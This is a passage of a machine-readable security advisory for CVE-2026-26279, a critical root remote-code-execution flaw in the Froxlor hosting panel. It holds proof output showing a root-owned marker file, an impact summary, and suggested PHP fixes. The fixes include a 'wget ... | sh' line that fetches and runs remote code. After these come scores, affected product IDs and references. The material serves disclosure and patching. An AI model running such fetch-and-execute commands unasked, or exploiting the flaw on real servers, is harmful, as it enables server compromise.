/tmp/VULN2_RCE_PROOF\n-rw-r--r-- 1 root root 0 Feb 11 05:58 /tmp/VULN2_RCE_PROOF\n```\n\nFile created with **root:root** ownership. Arbitrary command execution as root is confirmed.\n\n---\n\n## Impact\n\n- **Confidentiality:** Complete. Root access exposes all customer data, databases, SSL private keys, email contents.\n- **Integrity:** Complete. Attacker can modify any file, inject backdoors, alter DNS records.\n- **Availability:** Complete. Attacker can destroy the server, wipe databases, or deploy ransomware.\n- **Scope:** Changed. The attack originates in the web application but impacts the underlying operating system.\n\n---\n\n## Suggested Fix\n\n### Primary fix (Bug 1 — eliminates the root cause):\n```php\n// lib/Froxlor/Validate/Form/Data.php\n// Line 169:\n$fielddata['string_type'] = 'mail'; // was: == 'mail'\n// Line 175:\n$fielddata['string_type'] = 'url'; // was: == 'url'\n```\n\n### Defense-in-depth (Bug 2 — even if validation is fixed):\n```php\n// lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php, Line 428:\nFileDir::safe_exec(\n \"wget -O - https://get.acme.sh | sh -s email=\"\n . escapeshellarg(Settings::Get('panel.adminmail')),\n $return,\n ['|']\n);\n```\n\n### Defense-in-depth (ConfigServices.php):\n```php\n// All values in getReplacerArray() should be escaped with\n// escapeshellarg() when the template action type is \"install\" or \"command\"\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-33mp-8p67-xj7c.json?alt=media" }, { "category": "other", "text": "0.00584", "title": "EPSS" }, { "category": "other", "text": "4.1", "title": "NCSC Score" }, { "category": "other", "text": "There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "The CVSS vector string contains A:H (Availability Impact: High), There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5755795", "CSAFPID-5757222", "CSAFPID-533784", "CSAFPID-533785", "CSAFPID-533786", "CSAFPID-533787", "CSAFPID-533788", "CSAFPID-533789", "CSAFPID-533790", "CSAFPID-533791", "CSAFPID-533792", "CSAFPID-533794", "CSAFPID-533795", "CSAFPID-533796", "CSAFPID-533797", "CSAFPID-533799", "CSAFPID-533800", "CSAFPID-533801", "CSAFPID-584149", "CSAFPID-586038", "CSAFPID-586039", "CSAFPID-586040", "CSAFPID-586041", "CSAFPID-586042", "CSAFPID-586043", "CSAFPID-810703", "CSAFPID-810704", "CSAFPID-810705", "CSAFPID-810706", "CSAFPID-810707", "CSAFPID-810708", "CSAFPID-810709", "CSAFPID-810710", "CSAFPID-810711", "CSAFPID-810712", "CSAFPID-810713", "CSAFPID-810714", "CSAFPID-810715", "CSAFPID-810716", "CSAFPID-810717", "CSAFPID-810718", "CSAFPID-810719", "CSAFPID-810720", "CSAFPID-810721", "CSAFPID-835393", "CSAFPID-835394", "CSAFPID-835395", "CSAFPID-835396", "CSAFPID-876013", "CSAFPID-876014", "CSAFPID-876015", "CSAFPID-876016", "CSAFPID-876017", "CSAFPID-876018", "CSAFPID-876019", "CSAFPID-876020", "CSAFPID-877915", "CSAFPID-877916", "CSAFPID-879533", "CSAFPID-882822", "CSAFPID-882823", "CSAFPID-897815", "CSAFPID-945280", "CSAFPID-945281", "CSAFPID-945282", "CSAFPID-945283", "CSAFPID-945284", "CSAFPID-945285", "CSAFPID-945396", "CSAFPID-945397", "CSAFPID-1015398", "CSAFPID-1015399", "CSAFPID-1095067", "CSAFPID-1095068", "CSAFPID-1095069", "CSAFPID-1095070", "CSAFPID-1095071", "CSAFPID-1095072", "CSAFPID-1095073", "CSAFPID-2486098", "CSAFPID-2486099", "CSAFPID-2486100", "CSAFPID-2486101", "CSAFPID-2486102", "CSAFPID-2486103", "CSAFPID-3452625", "CSAFPID-3452626", "CSAFPID-3765852", "CSAFPID-3765853", "CSAFPID-3765854", "CSAFPID-3765855", "CSAFPID-3765856", "CSAFPID-3765857", "CSAFPID-3765858", "CSAFPID-3765859", "CSAFPID-3765860", "CSAFPID-4979442", "CSAFPID-4979443", "CSAFPID-4979444", "CSAFPID-5574732", "CSAFPID-5574733", "CSAFPID-5574734", "CSAFPID-5574735", "CSAFPID-5574736", "CSAFPID-5574737", "CSAFPID-5574738", "CSAFPID-5574739", "CSAFPID-5759017" ] }, "references": [ { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0577.json" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26279" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-26279" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-26279" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/26xxx/CVE-2026-26279.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26279" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-33mp-8p67-xj7c.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0577.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0577" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/froxlor/Froxlor/security/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.4" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/froxlor/froxlor/commit/22249677107f8f39f8d4a238605641e87dab4343" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26279" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-1015398", "CSAFPID-1015399", "CSAFPID-1095067", "CSAFPID-1095068", "CSAFPID-1095069", "CSAFPID-1095070", "CSAFPID-1095071", "CSAFPID-1095072", "CSAFPID-1095073", "CSAFPID-2486098", "CSAFPID-2486099", "CSAFPID-2486100", "CSAFPID-2486101", "CSAFPID-2486102", "CSAFPID-2486103", "CSAFPID-3452625", "CSAFPID-3452626", "CSAFPID-3765852", "CSAFPID-3765853", "CSAFPID-3765854", "CSAFPID-3765855", "CSAFPID-3765856", "CSAFPID-3765857", "CSAFPID-3765858", "CSAFPID-3765859", "CSAFPID-3765860", "CSAFPID-4979442", "CSAFPID-4979443", "CSAFPID-4979444", "CSAFPID-533784", "CSAFPID-533785", "CSAFPID-533786", "CSAFPID-533787", "CSAFPID-533788", "CSAFPID-533789", "CSAFPID-533790", "CSAFPID-533791", "CSAFPID-533792", "CSAFPID-533794", "CSAFPID-533795", "CSAFPID-533796", "CSAFPID-533797", "CSAFPID-533799", "CSAFPID-533800", "CSAFPID-533801", "CSAFPID-5574732", "CSAFPID-5574733", "CSAFPID-5574734", "CSAFPID-5574735", "CSAFPID-5574736", "CSAFPID-5574737", "CSAFPID-5574738", "CSAFPID-5574739", "CSAFPID-5755795", "CSAFPID-5757222", "CSAFPID-5759017", "CSAFPID-584149", "CSAFPID-586038", "CSAFPID-586039", "CSAFPID-586040", "CSAFPID-586041", "CSAFPID-586042", "CSAFPID-586043", "CSAFPID-810703", "CSAFPID-810704", "CSAFPID-810705", "CSAFPID-810706", "CSAFPID-810707", "CSAFPID-810708", "CSAFPID-810709", "CSAFPID-810710", "CSAFPID-810711", "CSAFPID-810712", "CSAFPID-810713", "CSAFPID-810714", "CSAFPID-810715", "CSAFPID-810716", "CSAFPID-810717", "CSAFPID-810718", "CSAFPID-810719", "CSAFPID-810720", "CSAFPID-810721", "CSAFPID-835393", "CSAFPID-835394", "CSAFPID-835395", "CSAFPID-835396", "CSAFPID-876013", "CSAFPID-876014", "CSAFPID-876015", "CSAFPID-876016", "CSAFPID-876017", "CSAFPID-876018", "CSAFPID-876019", "CSAFPID-876020", "CSAFPID-877915", "CSAFPID-877916", "CSAFPID-879533", "CSAFPID-882822", "CSAFPID-882823", "CSAFPID-897815", "CSAFPID-945280", "CSAFPID-945281", "CSAFPID-945282", "CSAFPID-945283", "CSAFPID-945284", "CSAFPID-945285", "CSAFPID-945396", "CSAFPID-945397" ] } ], "title": "CVE-2026-26279" } ] }